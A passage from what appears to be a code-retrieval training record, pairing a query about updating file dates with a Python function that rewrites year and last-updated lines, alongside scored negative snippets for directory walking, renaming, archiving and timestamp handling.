os.path.getmtime(first)\r\n last = os.path.getmtime(last)\r\n first = str(datetime.datetime.utcfromtimestamp(first))[:14]\r\n last = str(datetime.datetime.utcfromtimestamp(last))[:14]\r\n\r\n if first == last:\r\n self.use_file_mod_dates = False\r\n\r\n # Iterate through each file in supplied fsevents dir\r\n for filename in os.listdir(self.path):\r\n if filename == 'fseventsd-uuid':\r\n continue\r\n # Variables\r\n self.all_files_count += 1\r\n\r\n # Call the progress bar which shows parsing stats\r\n progress(self.all_files_count, t_files)\r\n\r\n buf = \"\"\r\n\r\n # Full path to source fsevent file\r\n self.src_fullpath = os.path.join(self.path, filename)\r\n # Name of source fsevent file\r\n self.src_filename = filename\r\n # UTC mod date of source fsevent file\r\n self.m_time = os.path.getmtime(self.src_fullpath)\r\n self.m_time = str(datetime.datetime.utcfromtimestamp((self.m_time))) + \" [UTC]\"\r\n\r\n # Regex to match against source fsevent log filename\r\n regexp = re.compile(r'^.*[\\][0-9a-fA-F]{16}$')\r\n\r\n # Test to see if fsevent file name matches naming standard\r\n # if not, assume this is a carved gzip\r\n if len(self.src_filename) == 16 and regexp.search(filename) is not None:\r\n c_last_wd = int(self.src_filename, 16)\r\n self.time_range_src_mod = prev_last_wd, c_last_wd, prev_mod_date, self.m_time\r\n self.is_carved_gzip = False\r\n else:\r\n self.is_carved_gzip = True\r\n\r\n # Attempt to decompress the fsevent archive\r\n try:\r\n with self.skip_gzip_check():\r\n self.files = gzip.GzipFile(self.src_fullpath, \"rb\")\r\n buf = self.files.read()\r\n\r\n except Exception as exp:\r\n # When permission denied is encountered\r\n if \"Permission denied\" in str(exp) and not os.path.isdir(self.src_fullpath):\r\n print('\\nEnsure that you have permissions to read '\r\n 'from {}\\n{}\\n'.format(self.path, str(exp)))\r\n sys.exit(0)\r\n # Otherwise write error to log file\r\n else:\r\n self.logfile.write(\r\n \"%s\\tError: Error while decompressing FSEvents file.%s\\n\" % (\r\n self.src_filename,\r\n str(exp)\r\n )\r\n )\r\n self.error_file_count += 1\r\n continue\r\n\r\n # If decompress is success, check for DLS headers in the current file\r\n dls_chk = FSEventHandler.dls_header_search(self, buf, self.src_fullpath)\r\n\r\n # If check for DLS returns false, write information to logfile\r\n if dls_chk is False:\r\n self.logfile.write('%s\\tInfo: DLS Header Check Failed. Unable to find a '\r\n 'DLS header. Unable to parse File.\\n' % (self.src_filename))\r\n # Continue to the next file in the fsevents directory\r\n self.error_file_count += 1\r\n continue\r\n\r\n self.parsed_file_count += 1\r\n\r\n # Accounts for fsevent files that get flushed to disk\r\n # at the same time. Usually the result of a shutdown\r\n # or unmount\r\n if not self.is_carved_gzip and self.use_file_mod_dates:\r\n prev_mod_date = self.m_time\r\n prev_last_wd = int(self.src_filename, 16)\r\n\r\n # If DLSs were found, pass the decompressed file to be parsed\r\n FSEventHandler.parse(self, buf)", "def load(self, dirname, pattern):\n\n cachefile = os.path.join(dirname, YACODIR_CACHEFILE)\n\n # TODO: get caching to work properly :(\n # if os.path.exists(cachefile):\n # if os.path.getmtime(dirname) == \\\n # os.path.getmtime(cachefile):\n # load cache\n # super(YacoDir, self).load(cachefile)\n # return\n\n for root, dirs, files in os.walk(dirname):\n #print('-' * 80)\n ##import sh\n #print(sh.ls(\"-l\", dirname))\n #print(root, dirs, files, pattern)\n to_parse = sorted(fnmatch.filter(files, pattern))\n base = root.replace(dirname, '').strip('/')\n base = base.replace('/', '.')\n #lg.critical(\"{0} {1}\".format(root, dirs))\n for filename in to_parse:\n fullname = os.path.join(root, filename)\n lg.debug(\"YacoDir loading {0}\".format(fullname))\n #print (\"loadlaod\", filename, fullname)\n nleaf = _get_leaf(base, filename, pattern)\n\n with open(fullname) as F:\n y = yaml.load(F.read())\n\n if nleaf == '':\n self.update(y)\n else:\n self[nleaf].update(y)\n #print('*' * 80)\n # print self.pretty()\n if self:\n # after loading - save to cache!\n super(YacoDir, self).save(cachefile)", "def rename_all(dirpath, startletter, startindex, verbose=1):\n\n if (verbose == 0):\n logging.getLogger().setLevel(logging.ERROR)\n elif (verbose == 1):\n logging.getLogger().setLevel(logging.WARNING)\n elif (verbose == 2):\n logging.getLogger().setLevel(logging.INFO)\n else:\n logging.getLogger().setLevel(logging.DEBUG)\n\n indexstr = startindex\n datetimestr_to_fullfname_dict = {}\n\n # iterate over all files in subdirectories from given root directory\n for rootdir, alldirs, allfiles in os.walk(dirpath):\n\n for afile in allfiles:\n\n # create the full path to the file\n fullfname = os.path.join(rootdir, afile)\n\n # check if there is a valid file\n if not (os.path.exists(fullfname) and\n os.path.isfile(fullfname)):\n logging.warning(\"Cannot access %r, skipping it\", fullfname)\n continue\n\n # First try if the file is an image file with EXIF tags\n # if so, return valid datetimestr, otherwise try date metadata\n datetimestr = extract_exif(fullfname)\n if not (datetimestr):\n datetimestr = extract_date_metadata(fullfname)\n\n # if valid datetimestr \n if (datetimestr):\n # this will handle the case when there is already the exact\n # same datetimestr in the dictionary(shouldn't happen often)\n while (datetimestr in datetimestr_to_fullfname_dict):\n datetimestr = datetimestr + '*'\n datetimestr_to_fullfname_dict[datetimestr] = fullfname\n logging.info(\n \"Entering datetimestr %r to dictionary\", datetimestr)\n else:\n logging.warning(\n \"No EXIF or date metadata found in %r, skipping it\",\n fullfname)\n\n # Go through the alphabetically (and therefore time-stamp sorted)\n # list of keys of the dictionary to do the rename\n for a_dtstr in sorted(datetimestr_to_fullfname_dict.keys()):\n\n # we discard the time portion as we don't need it for\n # the filename\n datestr = a_dtstr[:8]\n\n # the file extension from original filename\n afileext = get_fname_ext(\n datetimestr_to_fullfname_dict[a_dtstr]).upper()\n\n newfname = datestr + \"_\" + startletter + \"_\" + indexstr + afileext\n\n # create the new full filename by taking existing path of old \n # full filename and combining with new file name\n newfullfname = os.path.join(\n os.path.dirname(datetimestr_to_fullfname_dict[a_dtstr]),\n newfname)\n\n try:\n logging.info(\"Renaming %r -> %r\",\n datetimestr_to_fullfname_dict[a_dtstr],\n newfullfname)\n os.rename(datetimestr_to_fullfname_dict[a_dtstr],\n newfullfname)\n except os.error as oserr:\n logging.error(\"Can't rename file %s to %s: %s\",\n datetimestr_to_fullfname_dict[a_dtstr],\n newfullfname, oserr)\n\n\n indexstr = incr_indexstr(indexstr)", "def _iter_expiration_files(dirpath_expiration):\n if not os.path.isdir(dirpath_expiration):\n return\n regex_expiration_file = re.compile(_REGEX_EXPIRATION_FILE)\n for name in os.listdir(dirpath_expiration):\n path = os.path.join(dirpath_expiration, name)\n if not ( os.path.isfile(path)\n and re.match(regex_expiration_file, name)):\n raise RuntimeError(\n 'Unexpected file found in expiration folder: %s.', path)\n (sz_file_expiration, file_owner, _) = name.split('.')\n file_expiration = datetime.datetime.strptime(\n sz_file_expiration, _DATEFMT_EXPIRATION)\n yield (path, file_expiration, file_owner)", "def _zipdir(self, dir: Path, zip_handle: zipfile.ZipFile) -> None:\n for root, _, files in os.walk(dir):\n for file in files:\n zip_handle.write(os.path.join(root, file), file)", "def update_rundir(self):\n self.rundir = []\n run_index = len(self.rundir)\n while os.path.isdir( os.path.join(self.relaxdir, \"run.\" + str(run_index))):\n self.rundir.append( os.path.join(self.relaxdir, \"run.\" + str(run_index)) )\n run_index += 1", "def update_csv():\n return os.listdir('./data')", "def analyze_dir(self, dirname):\n if self.exceeded_max():\n return\n\n for (dirpath, dirnames, filenames) in os.walk(dir_name):\n for filename in filenames:\n self.analyze_file(dirname + \"/\" + filename)", "def walk():\n os.chdir('Lyrics')\n for directory_name, subdirectories, filenames in os.walk('.'):\n print(\"Directory:\", directory_name)\n print(\"\\tcontains subdirectories:\", subdirectories)\n print(\"\\tand files:\", filenames)\n print(\"(Current working directory is: {})\".format(os.getcwd()))\n for filename in filenames:\n shutil.move(os.path.join(directory_name, filename),\n os.path.join(directory_name) + '/' + get_fixed_filename(filename))", "def update(self, dT):\r\n\r\n current_delta_time = dT\r\n for module in self.modules:\r\n module(self)", "def _refresh_dag_dir(self) -> bool:\n now = timezone.utcnow()\n elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()\n if elapsed_time_since_refresh > self.dag_dir_list_interval:\n # Build up a list of Python files that could contain DAGs\n self.log.info(\"Searching for files in %s\", self._dag_directory)\n self._file_paths = list_py_file_paths(self._dag_directory)\n self.last_dag_dir_refresh_time = now\n self.log.info(\"There are %s files in %s\", len(self._file_paths), self._dag_directory)\n self.set_file_paths(self._file_paths)\n\n try:\n self.log.debug(\"Removing old import errors\")\n DagFileProcessorManager.clear_nonexistent_import_errors(file_paths=self._file_paths)\n except Exception:\n self.log.exception(\"Error removing old import errors\")\n\n def _iter_dag_filelocs(fileloc: str) -> Iterator[str]:\n \"\"\"Get \"full\" paths to DAGs if inside ZIP files.\n\n This is the format used by the remove/delete functions.\n \"\"\"\n if fileloc.endswith(\".py\") or not zipfile.is_zipfile(fileloc):\n yield fileloc\n return\n try:\n with zipfile.ZipFile(fileloc) as z:\n for info in z.infolist():\n if might_contain_dag(info.filename, True, z):\n yield os.path.join(fileloc, info.filename)\n except zipfile.BadZipFile:\n self.log.exception(\"There was an error accessing ZIP file %s %s\", fileloc)\n\n dag_filelocs = {full_loc for path in self._file_paths for full_loc in _iter_dag_filelocs(path)}\n\n from airflow.models.dagcode import DagCode\n\n SerializedDagModel.remove_deleted_dags(\n alive_dag_filelocs=dag_filelocs,\n processor_subdir=self.get_dag_directory(),\n )\n DagModel.deactivate_deleted_dags(\n dag_filelocs,\n processor_subdir=self.get_dag_directory(),\n )\n DagCode.remove_deleted_code(\n dag_filelocs,\n processor_subdir=self.get_dag_directory(),\n )\n\n return True\n return False" ]
[ "0.7497474", "0.65693516", "0.6360544", "0.6272613", "0.62687546", "0.6217366", "0.58838624", "0.58187634", "0.5807831", "0.57809776", "0.57797885", "0.57654995", "0.5759113", "0.57328516", "0.570991", "0.56900525", "0.56631005", "0.56558955", "0.5641615", "0.5629182", "0.5624835", "0.5609571", "0.55798995", "0.5569067", "0.55629313", "0.5555831", "0.55514437", "0.55399776", "0.55278116", "0.5514329", "0.5508528", "0.5508516", "0.54908544", "0.5484257", "0.5461388", "0.5459796", "0.5446649", "0.54400456", "0.54351115", "0.54151136", "0.5408854", "0.54035527", "0.5401808", "0.5399744", "0.5397668", "0.53771013", "0.53587115", "0.53533226", "0.5348619", "0.53469634", "0.533925", "0.5338088", "0.53359526", "0.53332573", "0.5326985", "0.5310846", "0.53027487", "0.529214", "0.52844626", "0.52817893", "0.5279784", "0.52753824", "0.5271847", "0.526116", "0.526065", "0.5258659", "0.52509683", "0.52485067", "0.52457654", "0.52457446", "0.52355283", "0.52323", "0.52294385", "0.5219128", "0.51992774", "0.5197912", "0.5191416", "0.51898384", "0.51883644", "0.5187193", "0.51869786", "0.518614", "0.51826197", "0.5182238", "0.51746273", "0.5173171", "0.5168616", "0.5167488", "0.5166635", "0.5163928", "0.51514167", "0.5150516", "0.5146269", "0.51378137", "0.5137087", "0.51370865", "0.5134745", "0.513472", "0.5132766", "0.5131435" ]
0.7363431
1
This function updates date of files passed into it.
def edit_files(i_file): a_file = open(i_file, "r") content = a_file.readlines() content[3] = f"years: {datetime.now().year}\n" content[4] = f'lastupdated: "{date.today()}"\n' a_file = open(i_file, "w") #open the same file and overrite line3 & 4 a_file.writelines(content) a_file.close()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def update_date(dest=dest):\n for root, _, files in os.walk(dest):\n ignore = [\"README.md\",\"SUMMARY.md\"]\n _ = [edit_files(root + \"/\" + file) for file in files if (file not in ignore and file.endswith(\".md\"))]", "def changeDate(names, date, ctlFunc = lambda s, d: True): \n\n # parse date\n try:\n day, month, year = re.fullmatch(\"(\\d\\d)(\\d\\d)(\\d\\d\\d\\d)\", date).groups()\n except AttributeError as e:\n raise\n \n # convert strings to ints\n day = int(day)\n month = int(month)\n year = int(year)\n \n for name in names:\n\n if ctlFunc(name, \"*DATE*\"):\n\n # get HH MM SS from file\n p_timestamp = os.path.getmtime(name)\n mdt = datetime.datetime.fromtimestamp(p_timestamp)\n \n # construct new datetime object with file time and provided date\n mdt = datetime.datetime(year, month, day, mdt.hour, mdt.minute, mdt.second)\n\n # change to new file timestamp by passing in datetime.timestamp() \n os.utime(name, (mdt.timestamp(), mdt.timestamp()))", "def _update_files():\n configuration_settings = get_configuration()\n\n # Need to find all of the files that are stored in the input_files directories in order to start building the\n # reports that will be used to generate the static log files.\n for input_path in configuration_settings.processing.inputs:\n search_path = pathlib.Path(input_path)\n\n # Currently going to make the assumption that everyone is using the path naming convention that I'm dictating\n # which is YYYY/MM/DD/file.ext\n for file_component in search_path.glob('*/*/*/*'):\n # Store all of the files into a dictionary containing the keys and a list of the files that are associated\n # with that day\n updaters.update_files(search_path, file_component)", "def fix_file_dates(source_file_name, dest_file_name):\n shutil.copystat(source_file_name, dest_file_name)\n print(\"Fixed dates for \" + dest_file_name)", "def rebase_add_date():\n\tfilenames, clippings = load_clippings(inFolder)\n\tfor file, clip in zip(filenames, clippings):\n\t\tdate = \"-\".join(file.split(\"-\")[:3])\n\t\tdate = date.split(\"/\")[-1]\n\t\tclip[\"clipDate\"] = date\n\t\twith open(file, \"w\") as outfile:\n\t\t\tjson.dump(clip, outfile)", "def get_file_date(self, file: str) -> date:", "def update(self, date):\r\n self.date = date", "def test_change_mtime(self):\n with pike.Graph('g') as graph:\n pike.glob('.', '*') | pike.ChangeListenerNode(fingerprint='mtime')\n self.make_files(foo='a', bar='b')\n ret = graph.run()\n self.assert_files_equal(ret['default'], ['foo', 'bar'])\n new_mtime = time.time() + 1\n os.utime('foo', (new_mtime, new_mtime))\n ret = graph.run()\n self.assert_files_equal(ret['default'], ['foo'])", "def last_file_updated(self):\n query = '*.xml'\n keymap_files = glob.glob(query)\n\n sorted_files = sorted(keymap_files, key=self.mtime, reverse=1)\n last_modified_file = sorted_files[0]\n second_last_modified_file = sorted_files[1]\n\n t1 = self.mtime(last_modified_file)\n t2 = self.mtime(second_last_modified_file)\n\n logger.debug('Last modified time: {0}'.format(t1))\n logger.debug('Second Last modified time: {0}'.format(t2))\n\n last_modified_time = self.mtime(last_modified_file)\n last_access_time = self.atime(last_modified_file)\n\n if sys.platform == \"win32\":\n logger.info('Detected Windows environment')\n # self.regenerate_osx(last_access_time, last_modified_time)\n elif sys.platform == 'darwin':\n logger.info('Detected OSX environment')\n # self.regenerate_windows(last_access_time, last_modified_time)\n else:\n logger.error('Unhandled platform: {0}'.format(sys.platform))\n pass", "def mtime(path):", "def setLastModified(when):", "def file_last_updated(self, file_last_updated):\n\n self._file_last_updated = file_last_updated", "def write_new_date(self) -> None:\n\n with open(str(os.path.join(THIS_DIR, \"data_file.json\")), mode='r') as json_file:\n data = json.load(json_file)\n data[self.site] = str(self.get_last_image_date())\n json_file.close()\n with open(str(os.path.join(THIS_DIR, \"data_file.json\")), mode='w') as json_file:\n json.dump(data, json_file)\n json_file.close()", "def statusupdate(filepath):\n pass", "def update(self):\n if os.path.isdir(self.full_path):\n self.file_list = os.listdir(self.full_path)\n else:\n self.file_list = []", "def checkFiles(self): \r\n mdate_filenames_list = []\r\n mdate_filenames_tuple = {}\r\n last24 = []\r\n now = datetime.datetime.now() \r\n noise,ft = file_type.split('.')\r\n ## note can do an entry bg color stoplight thing >24 hrs = red, 12-24 hrs = yellow < 12 = green nice little if loop\r\n for f in filenames_list:\r\n if os.path.isfile(f):\r\n lastmod_date = datetime.datetime.fromtimestamp(os.path.getmtime(f))\r\n mdate_filenames_tuple = lastmod_date, f\r\n mdate_filenames_list.append(mdate_filenames_tuple)\r\n \r\n if now - lastmod_date < file_age:\r\n \r\n #print (\"{} was last modified on {:%a %b %d %Y, %H:%M:%S, %Z}. Moving to 'destinaiton' transfer folder.\".format(f, lastmod_date))\r\n last24.append(f)\r\n shutil.copy2(f, destination)\r\n xferTime=time.time()\r\n \r\n fa = str(file_age) \r\n with sqlite3.connect('fileTransfer.db') as connection:\r\n c = connection.cursor()\r\n c.execute(\"INSERT INTO tbl_lastRun(col_timestamp, col_source, col_destination, col_file_type, col_file_age) VALUES (?,?,?,?,?)\",(xferTime, source, destination, ft, hrs))\r\n connection.commit()\r\n connection.close \r\n\r\n clear(self)\r\n ask_quit(self)", "def get_file_modification_date() -> str:\n file_modification_date = datetime.now().strftime(\"%d.%m.%Y\")\n print(file_modification_date)\n return file_modification_date", "def info_date(source_files: AllSourceFilenames = AllSourceFilenames(),\n out_datefirst: OutputCommonData = OutputCommonData(\"cwb.datefirst\"),\n out_datelast: OutputCommonData = OutputCommonData(\"cwb.datelast\"),\n datefrom: AnnotationAllSourceFiles = AnnotationAllSourceFiles(\"[dateformat.out_annotation]:dateformat.datefrom\"),\n dateto: AnnotationAllSourceFiles = AnnotationAllSourceFiles(\"[dateformat.out_annotation]:dateformat.dateto\"),\n timefrom: AnnotationAllSourceFiles = AnnotationAllSourceFiles(\"[dateformat.out_annotation]:dateformat.timefrom\"),\n timeto: AnnotationAllSourceFiles = AnnotationAllSourceFiles(\"[dateformat.out_annotation]:dateformat.timeto\")):\n first_date = None\n last_date = None\n\n for file in source_files:\n from_dates = sorted((int(x[0]), x[1]) for x in datefrom.read_attributes(file, (datefrom, timefrom)) if x[0])\n if from_dates and (first_date is None or from_dates[0] < first_date):\n first_date = from_dates[0]\n to_dates = sorted((int(x[0]), x[1]) for x in dateto.read_attributes(file, (dateto, timeto)) if x[0])\n if to_dates and (last_date is None or to_dates[-1] > last_date):\n last_date = to_dates[-1]\n\n if not first_date or not last_date:\n raise SparvErrorMessage(\"Corpus is configured as having date information, but no dates were found.\")\n\n # Parse and re-format dates (zero-padding dates with less than 8 digits, needed by strptime)\n first_date_d = datetime.strptime(f\"{str(first_date[0]).zfill(8)} {first_date[1]}\", \"%Y%m%d %H%M%S\")\n first_date_formatted = first_date_d.strftime(\"%Y-%m-%d %H:%M:%S\")\n last_date_d = datetime.strptime(f\"{str(last_date[0]).zfill(8)} {last_date[1]}\", \"%Y%m%d %H%M%S\")\n last_date_formatted = last_date_d.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n out_datefirst.write(first_date_formatted)\n out_datelast.write(last_date_formatted)", "def update_metadata_csv(self, source):\n timestamp = os.path.getmtime(source)\n filedate = datetime.datetime.fromtimestamp(timestamp)\n return self.update_metadata_date(filedate)", "def update_date(self, update_date):\n\n self._update_date = update_date", "def update_date(self, update_date):\n\n self._update_date = update_date", "def updated_date(self, updated_date):\n self._updated_date = updated_date", "def modify_input_file(filepath, updated_file_list):\n lines = 0 # current input line number\n file_changed = False # the file has changed\n\n # find and change matching lines\n pattern = re.compile(\"[Cc]opyright\")\n with open(filepath, mode='r', encoding='utf-8', newline='') as file_in:\n for line in file_in:\n lines += 1\n if pattern.search(line) and __old_date in line:\n line = line.replace(__old_date, __new_date)\n file_changed = True\n updated_file_list.append(line)\n return file_changed", "def update(src):", "def timestamp_one(self, path):\n stat = path.stat()\n sde = self.manager.source_date_epoch\n if stat.st_mtime > sde:\n cls = self.__class__.__name__\n self.log.debug(\n f\"[lite][base] <{cls}> set time to source_date_epoch {sde} on {path}\"\n )\n os.utime(path, (sde, sde))\n return\n return", "def timestamp_one(self, path):\n stat = path.stat()\n sde = self.manager.source_date_epoch\n if stat.st_mtime > sde:\n cls = self.__class__.__name__\n self.log.debug(\n f\"[lite][base] <{cls}> set time to source_date_epoch {sde} on {path}\"\n )\n os.utime(path, (sde, sde))\n return\n return", "def _archiveDataByDate(self, src, dest):\n root = os.getcwd()\n srcPath = join(root,src)\n destPath = join(root,dest)\n f = [] #Array with list of files in directory\n fDate = [] #Array with list of files with certain date;\n s = [] #Array with list of files successfully copied\n for (dirpath, dirnames, filenames) in walk(srcPath):\n f.extend(filenames)\n if len(f) > 0:\n for i in f:\n match = re.search(r'\\d{4}-\\d{2}-\\d{2}', i)\n if str(i) != 'archiving_log.txt' and str(i) != 'archiving_log.txt~' and str(i) != 'archivingScript.py' and match.group() == self.date:\n try:\n buffer_size = int(20000)\n fileSrcPath = join(dirpath, i)\n fileDestPath = join(destPath, i)\n with open(fileSrcPath, 'rb') as fsrc:\n with open(fileDestPath, 'wb') as fdest:\n copy = shutil.copyfileobj(fsrc,fdest,buffer_size)\n copy\n self._backupLog('Copy Operation File: '+str(i)+ '\\t' + 'Time: '+ str(time.strftime(\"%H:%M:%S\")) +'\\n') #+ '\\t'+ 'Path: '+ str(srcPath)\n s.append(i)\n except shutil.Error as e:\n self._backupLog('Error: %s' % e + '\\t' + 'File: '+str(i)+ '\\t' + 'Time: '+ str(time.strftime(\"%H:%M:%S\")) + '\\n')\n except IOError as e:\n self._backupLog('Error: %s' % e.strerror + '\\t' + 'File: '+str(i)+ '\\t' + 'Time: '+ str(time.strftime(\"%H:%M:%S\")) + '\\n')\n if len(s) >0:\n for (dirpath,dirnames,filenames) in walk(srcPath):\n for cfile in f:\n for sfile in s:\n if cfile == sfile:\n try:\n filetoDelete = join(srcPath, cfile)\n os.remove(filetoDelete)\n self._backupLog('Delete Operation File: '+str(cfile)+ '\\t' + 'Time: '+ str(time.strftime(\"%H:%M:%S\")) + '\\n')\n except OSError, e:\n self._backupLog('Error deleting file: %s - %s.' % (e.filename, e.strerror) + '\\t' + 'Time: '+ str(time.strftime(\"%H:%M:%S\")) + '\\n')", "def mtime(name):", "def checkDateForFileName(self):\n #self.currentLocalTime was already changed in log Temperatures\n if self.currentLocalTime.tm_mday != self.currentDay:\n #the day has changed we should start a new log file!\n self.logFile = self._logFile_default()\n self._create_log_file()", "def _update_modified_data_sources(self):\n new_last_imported = datetime.utcnow()\n self._update_modified_since(self.last_imported)\n self.last_imported = new_last_imported", "def add_timestamps(dir_video):\n print(\"Adding creation dates to file names\")\n os.chdir(dir_video)\n # get only top level dir info\n dir_data_video_files = next(os.walk(dir_video))\n list_video_files = dir_data_video_files[2] # get file list\n for f_name in list_video_files:\n if GOPRO_PATTERN.search(f_name):\n f_time = time.strftime(r\"%Y-%m-%d_%H-%M\", time.localtime(os.path.getctime(f_name)))\n os.rename(f_name, f\"{f_time}_{f_name}\")", "def updateFileInfo(self, data, pid):\n self.db.updateLinkInfo(data)\n self.evm.dispatchEvent(\"packageUpdated\", pid)", "def do_touch ( self, fspath ):\n return", "def autoBuildTick (self, event = None):\r\n for pathname, oldmtime in self.autobuildfiles.iteritems():\r\n newmtime = os.stat(pathname).st_mtime\r\n if newmtime != oldmtime:\r\n #print \"Auto rebuild triggered by: \", pathname\r\n self.autobuildfiles[pathname] = newmtime\r\n self.rebuild()\r\n break", "def update_rental_returned_date(self, rental_id, returned_date):\n super(RentalHistoryText, self).update_rental_returned_date(rental_id, returned_date)\n self.save_file()", "def fileparse(self, dir, givendate, i, j):\t\t# i and j are counters that will be incremented by at most 1 (each) every time fileparse is called\n if self.findcreatedate() > givendate:\t# Test file's creation date against date passed into function\n if j != 0:\t\t\t\t# If this is the first time (locally) we've found a self.filename that needs to be copied, reset j\n print \"\\n\",\n j = 0\n dest = dir + self.filename\n copy(self.filename, dest)\n print \"\\r{} being copied\".format(self.filename),\n i += 1\t\t\t\t\t# increment our count of self.filenames that have been copied in a row\n else:\n j += 1\t\t\t\t\t# otherwise, increment our count of self.filenames skipped\n print \"\\r{} files parsed after last success\".format(j),\n countarf = [i, j]\t\t\t\t\t# put i an j into an array, then return it\n return countarf", "def updated_date(self, updated_date):\n\n self._updated_date = updated_date", "def updated_date(self, updated_date):\n\n self._updated_date = updated_date", "def test_files(self):\r\n\r\n for path in self.get_files():\r\n self.assertTrue(datetime.fromtimestamp(os.path.getmtime(path)) > self.start_time,\r\n msg='File not recently modified: %s' % os.path.basename(path))", "def updateCodeFiles(self):\n # if this annoying slow, could probably drop to bash or soemthing\n # for a search/replace\n for filename, filetype in self._get_code_files():\n lines = open(filename).readlines()\n found_version_line = False\n\n if self.Verbose:\n print 'Reading %s' % filename\n\n if filetype is 'Python':\n lines, write_out = self._update_python_file(lines, filename)\n elif filetype is 'PyRex':\n lines, write_out = self._update_pyrex_file(lines, filename)\n elif filetype is 'C':\n lines, write_out = self._update_c_file(lines, filename)\n else:\n raise TypeError, \"Unknown code file type %s\" % filetype\n\n if write_out:\n self._file_writer(lines, filename)", "def update(**kwargs):\n\n def validate_valid_format(date):\n err_msg = \"date not in valid format, use YYYY-MM-DD\"\n\n # check if date is in valid format, YYYY-MM-DD\n # raise Exception if not\n date_s = date.split(\"-\")\n if not len(date_s) == 3:\n raise Exception(err_msg)\n year, month, day = date_s\n year_p = re.compile(\"\\d{4}\")\n month_day_p = re.compile(\"\\d{2}\")\n v_components = [\n {\"val\": year, \"pattern\": year_p},\n {\"val\": month, \"pattern\": month_day_p},\n {\"val\": day, \"pattern\": month_day_p}\n ]\n for v_component in v_components:\n value, pattern = [v_component[k] for k in [\"val\", \"pattern\"]]\n if not pattern.search(value):\n raise Exception(err_msg)\n \n # create a date object from the provided date, if it is older than\n # the oldest accepted time, do not update and raise Exception\n d = datetime.date(int(year), int(month), int(day))\n oldest_date_string = \\\n parse_checkpoint_ini()[\"refget_ena_checkpoint\"][\"absolute_start\"]\n oldest_date = datetime.date(\n *[int(a) for a in oldest_date_string.split(\"-\")]\n )\n\n if d < oldest_date:\n raise Exception(\"cannot update date, proposed date must be after \"\n + oldest_date_string)\n\n try:\n # get date string and validate, if OK, set the config value to\n # the proposed date and write to config file\n date_string = kwargs[\"date\"]\n validate_valid_format(date_string)\n config = parse_checkpoint_ini()\n config[\"refget_ena_checkpoint\"][\"run_start\"] = date_string\n with open(get_checkpoint_path(), \"w\") as configfile:\n config.write(configfile)\n print(\"ena checkpoint updated to \" + date_string + \". execute \"\n + \"'ena-refget-scheduler checkpoint view' to confirm\")\n \n except Exception as e:\n print(e)", "def touched_files(self, parent):", "def update_freq_dist(filename):\r\n pass", "def DateModified(filepath, stringformat=False):\n time_in_s = os.path.getmtime(filepath)\n if stringformat:\n return time.ctime(time_in_s)\n else:\n return time_in_s", "def updateDocFiles(self):\n for filename, filetype in self._get_doc_files():\n lines = open(filename).readlines()\n\n if self.Verbose:\n print 'Reading %s' % filename\n \n if filename.endswith('conf.py'):\n lines, write_out = self._update_doc_conf_file(lines, filename)\n else:\n raise TypeError, \"Unknown doc file type: %s\" % filetype\n\n if write_out:\n self._file_writer(lines, filename)", "def _file_update(self, filename):\n values = TaskInfo._parse_file(filename)\n self._load_dict(values)", "def updateBaseFiles(self):\n for filename, filetype in self._get_base_files():\n lines = open(filename).readlines()\n\n if self.Verbose:\n print 'Reading %s' % filename\n\n if filetype is 'Python':\n lines, write_out = self._update_python_file(lines, filename) \n elif filetype is 'Properties':\n lines, write_out = self._update_properties_file(lines,filename)\n else:\n raise TypeError, \"Unknown base file type %s\" % filetype\n\n if write_out:\n self._file_writer(lines, filename)", "def update(*args):", "def _update_direct(self, filename, timestamp, values, defer=None):\n\n if defer is None:\n defer = self._defer\n\n doupdate = lambda: super(RRDTwistedAPI, self).update(\n filename, timestamp, values)\n if not defer:\n doupdate()\n else:\n return threads.deferToThread(doupdate)", "def rename_date_formats(files_list):\n\n count_renamed = 0\n count_skipped = 0\n\n for file in files_list:\n\n # finding DD-DD-DDDD matches\n if date_regex.search(file):\n date_format = date_regex.search(file).group()\n date_split = date_format.split(\"-\")\n\n # detecting MM-DD-YYYY format and renaming to DD-MM-YYYY format\n if 1 <= int(date_split[0]) <= 12 and 1 <= int(date_split[1]) <= 31:\n european_format_date = \"-\".join([date_split[1], date_split[0], date_split[2]])\n new_file_name = file.replace(date_format, european_format_date)\n\n # checking that newly renamed file won't be a duplicate\n if new_file_name not in files_list:\n shutil.move(file, new_file_name)\n print(f\"<{file}> renamed to <{new_file_name}>\")\n count_renamed += 1\n else:\n print(f\"Cannot rename <{file}> because file <{new_file_name}> already exists\")\n count_skipped += 1\n\n # for files with DD-DD-DDDD format, but not MM-DD-YYYY like 89-77-3445\n else:\n print(f\"<{file}> has no MM-DD-YYYY date in name\")\n count_skipped += 1\n\n # for files with no MM-DD-YYYY format like 12-1221.txt or text.pdf\n else:\n print(f\"<{file}> has no MM-DD-YYYY date in name\")\n count_skipped += 1\n\n print(f\"\\nSUMMARY:\\nRenamed files count - {count_renamed}, not affected files count - {count_skipped}.\")", "def update(self, paths):\n raise NotImplementedError", "def format_finder(files):\r\n\r\n file_format = ['%Y', '%m', '%d']\r\n year = ''\r\n month = ''\r\n da = ''\r\n\r\n for file in files:\r\n\r\n index = file.find('_')\r\n date = file[: index]\r\n if '-' in date:\r\n separator = '-'\r\n else:\r\n separator = '_'\r\n date = date.split(separator)\r\n\r\n for d in range(len(date)):\r\n\r\n # If the date doesn't contain decimal (Eg: August) then it would return None\r\n if not date[d].isdecimal():\r\n return None\r\n\r\n # If the element in the date is of length greater then 2 then it would be a year (Eg: 2020)\r\n # And that value is set as the index of year\r\n if len(date[d]) > 2:\r\n year = d\r\n\r\n # If the integer of element in the date is of length greater then 12 then it would be a date (Eg: 25)\r\n # And that value is set as the index of date\r\n elif int(date[d]) > 12:\r\n da = d\r\n\r\n # If Both year and date are set, then the correct index for the month would be 3- (year+date)\r\n # Eg: 3 -(0+1)\r\n if (year != '') and (da != ''):\r\n month = 3 - (year + da)\r\n break\r\n\r\n # If Month is set, then we change the format according to their set value\r\n # Eg: format = ['%Y', '%m', '%d'], and year = 1, da = 0, month = 2\r\n # Then format[year=1] = '%Y'\r\n # Then format[da=0] = '%d'\r\n # Then format[month=2] = '%m'\r\n # format = ['%d', '%Y', '%m']\r\n if month:\r\n file_format[year] = '%Y'\r\n file_format[month] = '%m'\r\n file_format[da] = '%d'\r\n break\r\n else:\r\n # The script executes this only if none of the files had an date element( Which is not year)\r\n # That was greater than 12, Eg: 2020-06-10\r\n # Meaning that we cannot know for sure which element represents the 